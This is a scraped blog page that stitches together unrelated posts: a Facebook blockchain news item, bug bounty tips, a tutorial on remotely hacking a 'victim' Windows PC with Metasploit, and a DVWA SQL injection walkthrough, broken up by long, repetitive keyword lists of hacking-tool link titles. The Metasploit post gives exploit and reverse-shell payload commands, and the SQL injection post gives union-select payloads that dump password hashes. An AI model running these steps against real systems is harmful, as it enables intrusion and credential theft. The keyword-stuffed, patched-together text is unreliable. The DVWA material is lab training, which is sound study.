Saturday, June 3, 2023

Facebook Plans To Launch Its Own Cryptocurrency

Facebook Plans To Launch Its Own Cryptocurrency

Facebook Plans To Launch Its Own Cryptocurrency

Facebook Plans To Launch Its Own Cryptocurrency

The social network giant, Facebook is going through a bad phase with lots of ups and down. The recent scandal with Cambridge Analytica has caused the world's largest social network giant Facebook to change its stance on user privacy and to be more transparent about its use of the data it collects.
Since then, some social networks based in Blockchain have been popularized, namely Sphere, Steemit, and Howdoo. However, recently, something unusual announcement is announced by the social network giant Facebook itself, in which Facebook stated that it is investing in a Blockchain-based solution development team, but, the purpose of the project is not yet known.
It was with a post on the Facebook page that David Marcus confirmed his departure from the Messenger team and the creation of a small group dedicated to finding solutions based on the potential of Blockchain technology for Facebook.
David Marcus has not given much detail on the work he will do with his new group, saying only that they will study Blockchain from scratch so that they can use this revolutionary technology for Facebook.
"I'm setting up a small group to explore how to leverage Blockchain across Facebook, starting from scratch," stated David Marcus.
Despite being connected to Facebook's Messenger since 2014, David Marcus is no novice in these financial issues related to money transfers. In addition to having introduced the possibility of P2P payments in Messenger itself, David Marcus was President of PayPal and CEO of Zong, a company dedicated to payments on mobile devices.
However, his experience in this segment does not allow us to conclude that Facebook will create or support a crypto coin, but, it also doesn't mean that it will launch or support any crypto coin of its own. Blockchain technology has become famous thanks to crypto-coins, especially Bitcoin, but its potential expands dramatically to other areas.
The potential of Blockchain goes from the crypto-coins to the creation of real ecosystems online, supported by the users of the network. Sharing and storing data is a legacy that Blockchain allows you to explore and maybe the fact that Facebook will use it in your favor.
The lead post in Messenger was then handed over to Stan Chudnovsky, who now heads one of the most widely used communication services around the world, alongside WhatsApp.
Rumors also point out that James Everingham and Kevin Weil, both from Instagram, will also join David Marcus in this new onslaught of Facebook to one of today's most acclaimed technologies.

Related posts


  1. Best Hacking Tools 2019
  2. Hackers Toolbox
  3. Hacking Tools For Games
  4. Hack Rom Tools
  5. Android Hack Tools Github
  6. Hacks And Tools
  7. Pentest Tools For Ubuntu
  8. How To Hack
  9. Kik Hack Tools
  10. Hacker Tools Windows
  11. Hacking Tools Usb
  12. Hacking Tools Mac
  13. Hacker Tools Linux
  14. Hack Tools For Games
  15. Hacking Tools Pc
  16. Hacking Tools Github
  17. Hacking Tools For Games
  18. Top Pentest Tools
  19. Best Pentesting Tools 2018
  20. Hacker Hardware Tools
  21. Hacking Tools Windows 10
  22. Hack Tools For Mac
  23. Hacking Apps
  24. Hack Tools
  25. Hacker Tools Software
  26. Hacker Tools List
  27. Hacker Tools Software
  28. Github Hacking Tools
  29. Hacking Tools For Mac
  30. Hacker Tools For Ios
  31. Pentest Tools Open Source
  32. Growth Hacker Tools
  33. Pentest Tools Website Vulnerability
  34. Black Hat Hacker Tools
  35. Hacker Tools 2020
  36. Pentest Tools Open Source
  37. Hack Tools Download
  38. Pentest Tools Review
  39. Hacking Tools
  40. Pentest Tools Alternative
  41. Pentest Tools Download
  42. Best Pentesting Tools 2018
  43. Hacking Tools Free Download
  44. Hacking Tools And Software
  45. Hacking Tools Pc
  46. Hacker Tools Hardware
  47. Pentest Tools Free
  48. Tools For Hacker
  49. Growth Hacker Tools
  50. Hacker Tools For Mac
  51. Hack Apps
  52. Hack Tools Pc
  53. Hacking Tools For Windows Free Download
  54. Pentest Tools Find Subdomains
  55. How To Install Pentest Tools In Ubuntu
  56. Pentest Tools For Windows
  57. Hacking Tools Windows 10
  58. Hack Tools Download
  59. Hacking Tools Download
  60. Best Hacking Tools 2019
  61. Pentest Tools Online
  62. Hacking Apps
  63. What Is Hacking Tools

How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?



These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.


Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

More info


  1. Hacker Tools For Mac
  2. Hacker Tools Free
  3. Pentest Tools Url Fuzzer
  4. Pentest Tools Linux
  5. Best Hacking Tools 2020
  6. Free Pentest Tools For Windows
  7. Hackrf Tools
  8. Pentest Tools Android
  9. How To Hack
  10. Beginner Hacker Tools
  11. Hacking Tools For Kali Linux
  12. Hacking Tools Free Download
  13. Pentest Tools Alternative
  14. Hacking Tools
  15. Pentest Tools Tcp Port Scanner
  16. Hacker Tools Github
  17. Hacking Tools 2019
  18. Pentest Tools Download
  19. Hacking Tools Pc
  20. Hacker Tools Github
  21. Hack App
  22. Hack Rom Tools
  23. Pentest Tools Find Subdomains
  24. Hack And Tools
  25. Beginner Hacker Tools
  26. Pentest Tools Find Subdomains
  27. Hacker Tools
  28. Hack Apps
  29. Pentest Tools Free
  30. How To Install Pentest Tools In Ubuntu
  31. How To Install Pentest Tools In Ubuntu
  32. How To Hack
  33. Hack Tools For Mac
  34. Pentest Tools Apk
  35. Hacking Tools Usb
  36. Hacking Tools Pc
  37. Pentest Tools Review
  38. Hacking Tools Free Download
  39. Pentest Tools Kali Linux
  40. Pentest Tools Windows
  41. Tools 4 Hack
  42. How To Install Pentest Tools In Ubuntu
  43. Pentest Tools Github
  44. Hacking Tools For Kali Linux
  45. Hack Tools
  46. Hacker Tools Apk Download
  47. Hacker Tools Windows
  48. Hack Tools Github
  49. Pentest Tools For Android
  50. Hacking Tools And Software
  51. Hacker Tools For Pc
  52. Hacker Tools Github
  53. Hacking Tools Windows
  54. Pentest Tools
  55. Hack Tools For Windows
  56. Hacker Tools List
  57. Growth Hacker Tools
  58. Pentest Box Tools Download
  59. Hack Tools For Windows
  60. Blackhat Hacker Tools
  61. Pentest Tools Apk
  62. Pentest Tools
  63. Pentest Tools Url Fuzzer
  64. Pentest Tools Windows
  65. Pentest Tools Open Source
  66. Pentest Reporting Tools
  67. Pentest Tools Subdomain
  68. Hacking Tools For Kali Linux
  69. Hacking Tools Name
  70. Pentest Tools Website
  71. Free Pentest Tools For Windows
  72. Pentest Tools Online
  73. Hacking App
  74. Hacker Tools 2020

Friday, June 2, 2023

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

Continue reading


  1. Hacker Tools Linux
  2. Hack Rom Tools
  3. Pentest Tools Nmap
  4. New Hack Tools
  5. Hack Rom Tools
  6. Hacker Tools Software
  7. How To Make Hacking Tools
  8. Hacking Tools For Windows 7
  9. Pentest Tools For Ubuntu
  10. Hacker Hardware Tools
  11. Hacking Tools Hardware
  12. Pentest Tools Github
  13. Pentest Tools Open Source
  14. Hacking Tools For Windows 7
  15. Pentest Tools Website
  16. Pentest Tools Framework
  17. Pentest Tools Review
  18. Pentest Tools Open Source
  19. Hack Tools For Windows
  20. Pentest Tools Subdomain
  21. Hacker Tools
  22. Hacking Tools For Mac
  23. Hacker Security Tools
  24. Pentest Tools Bluekeep
  25. Hacking Tools Pc
  26. Pentest Box Tools Download
  27. Hacks And Tools
  28. Hacker Tools 2019
  29. Hacker
  30. Hack Tools For Ubuntu
  31. Pentest Tools Windows
  32. Hack Tools
  33. Free Pentest Tools For Windows
  34. Hack Website Online Tool
  35. Hack Tools Github
  36. Game Hacking
  37. Hacker Tools 2019
  38. Pentest Tools
  39. Hack Tools
  40. Hacker Tools Hardware
  41. Hacking Tools For Mac
  42. Hacker Tools Mac
  43. What Is Hacking Tools
  44. Pentest Tools Apk
  45. Hacker Tools Linux
  46. Computer Hacker
  47. Hacking Tools For Games
  48. Pentest Automation Tools
  49. Hacking Tools For Windows Free Download
  50. Hacker Tools Hardware
  51. Game Hacking
  52. Hacker Security Tools
  53. Bluetooth Hacking Tools Kali
  54. Pentest Tools Apk
  55. What Is Hacking Tools
  56. Hacker Hardware Tools
  57. Hacking Tools Mac
  58. Growth Hacker Tools
  59. Wifi Hacker Tools For Windows
  60. Hacker Search Tools
  61. Hack Tools 2019
  62. Blackhat Hacker Tools
  63. Hacker Tools Online
  64. Hacks And Tools
  65. Hacking Tools Software
  66. Hack Tools 2019
  67. Pentest Tools Bluekeep
  68. How To Make Hacking Tools
  69. Hacking Tools For Mac
  70. Hacker
  71. Bluetooth Hacking Tools Kali
  72. Pentest Tools Download
  73. Nsa Hack Tools Download
  74. Hack Tools Download
  75. Pentest Tools For Android
  76. Nsa Hacker Tools
  77. Hacker Hardware Tools
  78. Best Hacking Tools 2019
  79. Hacking Tools For Windows Free Download
  80. Computer Hacker
  81. How To Hack
  82. Hacker Tools Mac
  83. Hacking Tools Kit
  84. Hacks And Tools
  85. Install Pentest Tools Ubuntu
  86. Growth Hacker Tools
  87. Pentest Recon Tools
  88. Hacker Tools Free
  89. Hack Tools Github
  90. Pentest Tools Open Source
  91. Hack Tools
  92. Kik Hack Tools
  93. Hacker Tools
  94. Best Pentesting Tools 2018
  95. Pentest Tools Kali Linux
  96. Hack App
  97. Growth Hacker Tools
  98. Nsa Hack Tools Download
  99. Underground Hacker Sites
  100. Pentest Tools Website Vulnerability
  101. Kik Hack Tools
  102. Hacker Tools Software
  103. Pentest Tools Windows
  104. Hacking Tools For Kali Linux
  105. Hacking Tools And Software
  106. Hacking Tools
  107. Hackrf Tools
  108. Nsa Hack Tools
  109. What Are Hacking Tools
  110. Hacker Tools List
  111. Pentest Box Tools Download
  112. Hacking Tools Mac
  113. Pentest Tools For Android
  114. Hack Tools For Pc
  115. Pentest Recon Tools
  116. Hacking Tools Kit
  117. Hack Tools
  118. Hacking Tools Download
  119. Hacking Tools 2019
  120. Hacking Tools For Windows
  121. Hacker Techniques Tools And Incident Handling
  122. Wifi Hacker Tools For Windows
  123. Hack Tools For Mac
  124. Hack Tools For Windows
  125. Pentest Tools
  126. Install Pentest Tools Ubuntu
  127. Pentest Tools
  128. Black Hat Hacker Tools
  129. Hacking Tools Name
  130. Pentest Automation Tools
  131. Nsa Hack Tools
  132. Pentest Tools Open Source
  133. Android Hack Tools Github
  134. Hack Tools Pc
  135. Pentest Tools Review
  136. Pentest Tools Alternative
  137. Pentest Tools List
  138. Hack Tools
  139. Hack Tools
  140. Tools 4 Hack
  141. Hacking Tools Github
  142. Hacker Search Tools
  143. How To Hack
  144. Hacker Hardware Tools
  145. Pentest Tools Subdomain
  146. Pentest Tools Review
  147. Pentest Tools Port Scanner
  148. Hacker Tools For Ios
  149. Hack Tools For Ubuntu
  150. Pentest Tools Online
  151. Pentest Tools Url Fuzzer
  152. What Is Hacking Tools
  153. Hacker Tools For Pc
  154. Hacker Tools Software
  155. Hack Tools For Windows
  156. Best Hacking Tools 2020
  157. World No 1 Hacker Software
  158. Hacker Tools Apk

Learning Web Pentesting With DVWA Part 2: SQL Injection

In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
SELECT first_name, sur_name FROM users WHERE user_id = '1';
The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = '''; 
The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
'-- -
or
'#
we should get no error. Now our crafted query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''-- -'; 
or
SELECT first_name, sur_name FROM users WHERE user_id = ''#'; 
since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
After knowing how things might be working on the server side, we will start to attack the application.
First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
' order by 1-- - 
This MySQL server might execute the query as:
SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -'; 
you get the idea now.
if we don't get any error message, we will increase the number to 2 like this:
' order by 2-- - 
still no error message, lets add another:
' order by 3-- - 
and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
Now lets use the union select SQL statement to get information about the database itself.
' union select null, version()-- - 
You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
Now lets check who the database user is using the user() function of mariadb:
' union select null, user()-- - 
After clicking the submit button you should be able to see the user of the database in surname.

Now lets get some information about the databases in the database.
Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- - 
This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- - 
It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- - 

We can see the password column in the output now lets get those passwords:
' union select user, password from users-- - 
Of-course those are the hashes and not plain text passwords. You need to crack them.
Hope you learned something about SQL injection in this article. See you next time.

References:

1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html
Related articles